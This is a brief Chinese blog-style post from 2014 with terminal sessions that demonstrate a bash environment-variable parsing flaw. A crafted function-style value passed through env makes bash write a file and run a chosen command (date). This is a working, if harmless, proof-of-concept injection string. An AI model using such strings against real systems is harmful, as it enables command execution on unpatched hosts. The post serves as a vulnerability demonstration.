一个linux下的bash安全漏洞

1. 通过设置一个特殊的环境变量的env，能间接地查到到linux命令的属性，如下：

[2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

ls: cannot access date: No such file or directory

[2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

bash: X: line 1: syntax error near unexpected token `='

bash: X: line 1: `'

bash: error importing function definition for `X'

[2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

-rw-rw-r--. 1 david david 0 Sep 27 13:01 date

[2014-09-27 13:01:27 david@davidcchen ~]$

2. 一次运行环境变量。

[2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

zsh 4.3.10 (x86_64-redhat-linux-gnu)

[2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

Copyright (C) 2009 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later

This is free software; you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

[2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c echo date; cat echo; rm echo

bash: X: line 1: syntax error near unexpected token `='

bash: X: line 1: `'

bash: error importing function definition for `X'

Sat Sep 27 13:03:52 CST 2014

---------->成功运行date命令

[2014-09-27 13:03:52 david@davidcchen ~]$